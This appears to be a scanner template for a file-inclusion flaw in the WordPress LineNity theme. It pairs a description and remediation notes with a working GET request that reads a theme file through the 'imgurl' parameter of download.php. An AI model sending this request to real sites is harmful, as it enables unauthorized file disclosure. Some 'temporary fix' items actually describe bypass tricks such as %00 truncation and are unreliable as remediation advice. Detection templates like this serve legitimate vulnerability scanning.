id: CNVD-2014-02541
info:
  name: WordPress LineNity theme arbitrary file contains vulnerability POC
  author:
  - l0ne1y
  description: |-
    WordPress Theme Linenity 'download.php' local file contains vulnerability
    WordPress is a blogging platform developed using PHP language. Users can set up their own blogs on servers that support PHP and MySQL databases.

    The WordPress Linenity Theme 'download.php' script failed to properly filter the 'imgurl' parameter data, allowing remote attackers to exploit the vulnerability to conduct directory traversal attacks and view system files with WEB permissions.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patch or the latest version of the program: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803

    Temporary fix:
    1. Use open_basedir configuration in PHP to restrict access to specified areas and truncate the path length.
    2. Filter. (dot)/(backslash)\\(backslash), encoding bypass
    3. Disable server remote file inclusion
    4. For the situation where the included file suffix is ​​restricted, the PHP version is less than 5.3, php.ini magic_quotes_gpc = off, and the addslashes function is not used for controllable parameters. If these three conditions are met, %00 truncation can be used.
    5. Question mark, pound sign, and space bypass (remote)
requests:
- matchers:
  - type: dsl
    dsl:
    - 'status_code==200 && contains(body,"box_excerpt_append") && contains(body,"gplab_changeInsert") '
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/themes/linenity/functions/download.php?imgurl=theme-functions.php&name=theme-functions.php'
  method: GET
